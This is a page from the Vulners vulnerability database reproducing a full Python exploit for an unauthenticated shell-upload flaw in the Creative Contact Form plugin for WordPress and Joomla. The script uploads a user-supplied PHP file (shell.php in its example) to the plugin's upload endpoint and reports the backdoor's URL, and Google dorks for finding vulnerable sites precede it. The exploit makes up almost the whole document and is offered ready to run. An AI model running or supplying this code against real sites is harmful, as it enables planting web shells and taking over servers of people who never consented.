Vulners
Lucene search
WordPress / Joomla Creative Contact Form 0.9.7 Shell Upload Exploit
#!/usr/bin/python
#
# Exploit Name: Wordpress and Joomla Creative Contact Form Shell Upload Vulnerability
# Wordpress plugin version: <= 0.9.7
# Joomla extension version: <= 2.0.0
#
# Vulnerability discovered by Gianni Angelozzi
#
# Exploit written by Claudio Viviani
#
# Dork google wordpress: inurl:inurl:sexy-contact-form
# Dork google joomla : inurl:com_creativecontactform
#
# Tested on BackBox 3.x
#
# http connection
import urllib, urllib2, sys, mimetypes
# Args management
import optparse
# file management
import os, os.path
# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return url
# Check if file exists and has readable
def checkfile(file):
if not os.path.isfile(file) and not os.access(file, os.R_OK):
print '[X] '+file+' file is missing or not readable'
sys.exit(1)
else:
return file
# Get file's mimetype
def get_content_type(filename):
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
# Create multipart header
def create_body_sh3ll_upl04d(payloadname):
getfields = dict()
payloadcontent = open(payloadname).read()
LIMIT = '----------lImIt_of_THE_fIle_eW_$'
CRLF = '\r\n'
L = []
for (key, value) in getfields.items():
L.append('--' + LIMIT)
L.append('Content-Disposition: form-data; name="%s"' % key)
L.append('')
L.append(value)
L.append('--' + LIMIT)
L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', payloadname))
L.append('Content-Type: %s' % get_content_type(payloadname))
L.append('')
L.append(payloadcontent)
L.append('--' + LIMIT + '--')
L.append('')
body = CRLF.join(L)
return body
banner = """
___ ___ __ __,-,__
| Y .-----.----.--| .-----.----.-----.-----. | ' '__|
|. | | _ | _| _ | _ | _| -__|__ --| | __|
|. / \ |_____|__| |_____| __|__| |_____|_____| |_______|
|: | _______ |__| __ |_|
|::.|:. | | _ .-----.-----.--------| .---.-.
`--- ---' |___| | _ | _ | | | _ |
|. | |_____|_____|__|__|__|__|___._|
|: 1 |
|::.. . |
`-------'
_______ __ __ _______ __ __
| _ .----.-----.---.-| |_|__.--.--.-----. | _ .-----.-----| |_.---.-.----| |_
|. 1___| _| -__| _ | _| | | | -__| |. 1___| _ | | _| _ | __| _|
|. |___|__| |_____|___._|____|__|\___/|_____| |. |___|_____|__|__|____|___._|____|____|
|: 1 | _______ |: 1 |
|::.. . | | _ .-----.----.--------. |::.. . |
`-------' |. 1___| _ | _| | `-------'
|. __) |_____|__| |__|__|__|
|: |
|::.|
`---'
Cr3ative C0nt4ct Form Sh3ll Upl04d
Discovered by:
Gianni Angelozzi
Written by:
Claudio Viviani
http://www.homelab.it
[email protected]
[email protected]
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
commandList = optparse.OptionParser('usage: %prog -t URL -c CMS-f FILENAME.PHP [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
)
commandList.add_option('-c', '--cms', action="store",
help="Insert CMS Type: wordpress|joomla",
)
commandList.add_option('-f', '--file', action="store",
help="Insert file name, ex: shell.php",
)
commandList.add_option('--timeout', action="store", default=10, type="int",
help="[Timeout Value] - Default 10",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target or not options.file or not options.cms:
print(banner)
commandList.print_help()
sys.exit(1)
payloadname = checkfile(options.file)
host = checkurl(options.target)
timeout = options.timeout
cmstype = options.cms
print(banner)
if options.cms == "wordpress":
url_sexy_upload = host+'/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php'
backdoor_location = host+'/wp-content/plugins/sexy-contact-form/includes/fileupload/files/'
elif options.cms == "joomla":
url_sexy_upload = host+'/components/com_creativecontactform/fileupload/index.php'
backdoor_location = host+'/components/com_creativecontactform/fileupload/files/'
else:
print("[X] -c options require: 'wordpress' or 'joomla'")
sys.exit(1)
content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
bodyupload = create_body_sh3ll_upl04d(payloadname)
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'content-type': content_type,
'content-length': str(len(bodyupload)) }
try:
req = urllib2.Request(url_sexy_upload, bodyupload, headers)
response = urllib2.urlopen(req)
if "error" in response.read():
print("[X] Upload Failed :(")
else:
print("[!] Shell Uploaded")
print("[!] "+backdoor_location+options.file)
except urllib2.HTTPError as e:
print("[X] Http Error: "+str(e.code))
except urllib2.URLError as e:
print("[X] Connection Error: "+str(e.code))
# 0day.today [2018-01-02] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Oct 2014 00:00Current
7.2High risk
Vulners AI Score7.2